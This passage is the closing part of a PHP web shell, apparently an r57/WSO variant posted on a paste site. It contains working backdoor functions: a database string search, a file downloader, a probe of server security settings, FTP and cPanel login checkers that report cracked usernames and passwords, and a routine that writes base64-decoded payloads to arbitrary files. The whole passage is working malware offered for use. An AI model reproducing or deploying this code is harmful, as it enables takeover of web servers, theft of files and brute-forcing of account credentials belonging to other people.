  3561. $query = "SELECT * FROM `$table` WHERE `$column` LIKE '%$string%'";
  3562. $query = mysql_query($query);
  3563. $result = mysql_num_rows($query);
  3564. if($result > 0){
  3565. $founded[] = array('table'=>$table,'column'=>$column);
  3566. }
  3567. }
  3568. }
  3569. return $founded;
  3570. }
  3571.  
  3572. function cleandir($d){ // Function to clean up the $dir and $curdir variables
  3573. $d = @realpath($d);
  3574. $d = str_replace("\\\\", "\\", $d);
  3575. $d = str_replace("////", "//", $d);
  3576. return($d);
  3577. }
  3578.  
  3579. function wsoPermsColor($f) {
  3580. if (!@is_readable($f))
  3581. return '<font color=#FF0000>' . @wsoPerms(@fileperms($f)) . '</font>';
  3582. elseif (!@is_writable($f))
  3583. return '<font color=white>' . @wsoPerms(@fileperms($f)) . '</font>';
  3584. else
  3585. return '<font color=#25ff00>' . @wsoPerms(@fileperms($f)) . '</font>';
  3586. }
  3587.  
  3588. function wsoPerms($p) {
  3589. if (($p & 0xC000) == 0xC000)$i = 's';
  3590. elseif (($p & 0xA000) == 0xA000)$i = 'l';
  3591. elseif (($p & 0x8000) == 0x8000)$i = '-';
  3592. elseif (($p & 0x6000) == 0x6000)$i = 'b';
  3593. elseif (($p & 0x4000) == 0x4000)$i = 'd';
  3594. elseif (($p & 0x2000) == 0x2000)$i = 'c';
  3595. elseif (($p & 0x1000) == 0x1000)$i = 'p';
  3596. else $i = 'u';
  3597. $i .= (($p & 0x0100) ? 'r' : '-');
  3598. $i .= (($p & 0x0080) ? 'w' : '-');
  3599. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  3600. $i .= (($p & 0x0020) ? 'r' : '-');
  3601. $i .= (($p & 0x0010) ? 'w' : '-');
  3602. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  3603. $i .= (($p & 0x0004) ? 'r' : '-');
  3604. $i .= (($p & 0x0002) ? 'w' : '-');
  3605. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  3606. return $i;
  3607. }
  3608.  
  3609. function perm($file)
  3610. {
  3611. if(file_exists($file))
  3612. {
  3613. return @substr(@sprintf('%o', @fileperms($file)), -4);
  3614. }
  3615. else
  3616. {
  3617. return "????";
  3618. }
  3619. }
  3620.  
  3621. function sa_download($path)
  3622. {
  3623. header('Content-Description: File Transfer');
  3624. header('Content-Type: application/octet-stream');
  3625. header('Content-Disposition: attachment; filename='.basename($path));
  3626. header('Content-Transfer-Encoding: binary');
  3627. header('Expires: 0');
  3628. header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
  3629. header('Pragma: public');
  3630. header('Content-Length: ' . filesize($path));
  3631. ob_clean();
  3632. flush();
  3633. readfile($path);
  3634. exit;
  3635. }
  3636.  
  3637. function findit($mytext,$starttag,$endtag) {
  3638. $posLeft = @stripos($mytext,$starttag)+strlen($starttag);
  3639. $posRight = @stripos($mytext,$endtag,$posLeft+1);
  3640. return @substr($mytext,$posLeft,$posRight-$posLeft);
  3641. }
  3642.  
  3643. function MsSQL()
  3644. {
  3645. if(@function_exists('mssql_connect'))
  3646. {
  3647. $msSQL = '<font color="red">ON</font>';
  3648. }
  3649. else
  3650. {
  3651. $msSQL = '<font color="green">OFF</font>';
  3652. }
  3653. return $msSQL;
  3654. }
  3655. function MySQL2()
  3656. {
  3657. $mysql_try = @function_exists('mysql_connect');
  3658. if($mysql_try)
  3659. {
  3660. $mysql = '<font color="red">ON</font>';
  3661. }
  3662. else
  3663. {
  3664. $mysql = '<font color="green">OFF</font>';
  3665. }
  3666. return $mysql;
  3667. }
  3668. function Gzip()
  3669. {
  3670. if (@function_exists('gzencode'))
  3671. {
  3672. $gzip = '<font color="red">ON</font>';
  3673. }
  3674. else
  3675. {
  3676. $gzip = '<font color="green">OFF</font>';
  3677. }
  3678. return $gzip;
  3679. }
  3680. function MysqlI()
  3681. {
  3682. if (@function_exists('mysqli_connect'))
  3683. {
  3684. $mysqli = '<font color="red">ON</font>';
  3685. }
  3686. else
  3687. {
  3688. $mysqli = '<font color="green">OFF</font>';
  3689. }
  3690. return $mysqli;
  3691. }
  3692. function MSQL()
  3693. {
  3694. if (@function_exists('msql_connect'))
  3695. {
  3696. $mSql = '<font color="red">ON</font>';
  3697. }
  3698. else
  3699. {
  3700. $mSql = '<font color="green">OFF</font>';
  3701. }
  3702. return $mSql;
  3703. }
  3704. function PostgreSQL()
  3705. {
  3706. if(@function_exists('pg_connect'))
  3707. {
  3708. $postgreSQL = '<font color="red">ON</font>';
  3709. }
  3710. else
  3711. {
  3712. $postgreSQL = '<font color="green">OFF</font>';
  3713. }
  3714. return $postgreSQL;
  3715. }
  3716.  
  3717. function Oracle()
  3718. {
  3719. if(@function_exists('ocilogon'))
  3720. {
  3721. $oracle = '<font color="red">ON</font>';
  3722. }
  3723. else
  3724. {
  3725. $oracle = '<font color="green">OFF</font>';
  3726. }
  3727. return $oracle;
  3728. }
  3729.  
  3730.  
  3731. function RegisterGlobals()
  3732. {
  3733. if(@ini_get('register_globals'))
  3734. {
  3735. $registerg= '<font color="red">ON</font>';
  3736. }
  3737. else
  3738. {
  3739. $registerg= '<font color="green">OFF</font>';
  3740. }
  3741. return $registerg;
  3742. }
  3743. function HardSize($size)
  3744. {
  3745. if($size >= 1073741824)
  3746. {
  3747. $size = @round($size / 1073741824 * 100) / 100 . " GB";
  3748. }
  3749. elseif($size >= 1048576)
  3750. {
  3751. $size = @round($size / 1048576 * 100) / 100 . " MB";
  3752. }
  3753. elseif($size >= 1024)
  3754. {
  3755. $size = @round($size / 1024 * 100) / 100 . " KB";
  3756. }
  3757. else
  3758. {
  3759. $size = $size . " B";
  3760. }
  3761. return $size;
  3762. }
  3763. function Curl()
  3764. {
  3765. if(extension_loaded('curl'))
  3766. {
  3767. $curl = '<font color="red">ON</font>';
  3768. }
  3769. else
  3770. {
  3771. $curl = '<font color="green">OFF</font>';
  3772. }
  3773. return $curl;
  3774. }
  3775.  
  3776. function magicQouts()
  3777. {
  3778. $mag=get_magic_quotes_gpc();
  3779. if (empty($mag))
  3780. {
  3781. $mag = '<font color="green">OFF</font>';
  3782. }
  3783. else
  3784. {
  3785. $mag= '<font color="red">ON</font>';
  3786. }
  3787. return $mag;
  3788. }
  3789.  
  3790. function openBaseDir()
  3791. {
  3792. $openBaseDir = @ini_get("open_basedir");
  3793. if (!$openBaseDir)
  3794. {
  3795. $openBaseDir = '<font color="green">OFF</font>';
  3796. }
  3797. else
  3798. {
  3799. $openBaseDir = '<font color="red">ON</font>';
  3800. }
  3801. return $openBaseDir;
  3802. }
  3803.  
  3804. function ftp_check($host,$user,$pass,$timeout){
  3805. $ch = curl_init();
  3806. curl_setopt($ch, CURLOPT_URL, "ftp://$host");
  3807. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3808. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  3809. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  3810. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  3811. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  3812. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  3813. $data = curl_exec($ch);
  3814. if ( curl_errno($ch) == 28 ) {
  3815.  
  3816. print "<b> Error : Connection timed out </b>";
  3817. exit;}
  3818.  
  3819. elseif ( curl_errno($ch) == 0 ){
  3820.  
  3821. print
  3822. "
  3823. <b>found username : <font color='#FF0000'> $user </font> - password :
  3824. <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);
  3825. exit;}
  3826.  
  3827.  
  3828. function cpanel_check($host,$user,$pass,$timeout){
  3829. $ch = curl_init();
  3830. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  3831. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3832. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  3833. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  3834. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  3835. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  3836. $data = curl_exec($ch);
  3837. if ( curl_errno($ch) == 28 ) {
  3838. print "<b> Error : Connection timed out</b>";
  3839. exit;}
  3840. elseif ( curl_errno($ch) == 0 ){
  3841.  
  3842. print
  3843. "
  3844. <b>found username : <font color='#FF0000'>$user</font> - password :
  3845. <font color='#FF0000'>$pass </font></b><br>"; }curl_close($ch);
  3846. exit; }
  3847.  
  3848.  
  3849. function op_sa($f,$t) {
  3850. $w = @fopen($f,"w") or @function_exists('file_put_contents');
  3851. if($w){
  3852. @fwrite($w,@base64_decode($t));
  3853. @fclose($w);
  3854. }
  3855. }
  3856.  
  3857.  
  3858. echo "</td></tr></table></div> |<b class='foter'>Progr4m3r by <a href='$pg?sws=ab'>al-swisre Edited: r57.gen.tr</a></b>|<b class='foter'>E-m4il : <a href='#'>oy3@hotmail.com</a></b>|<b class='foter'>r57 shell : <a target='_blank' href='http://r57.gen.tr'>r57 shell</a></b>| </html> ";
  3859.  
  3860. ?>
Add Comment
Please, Sign In to add comment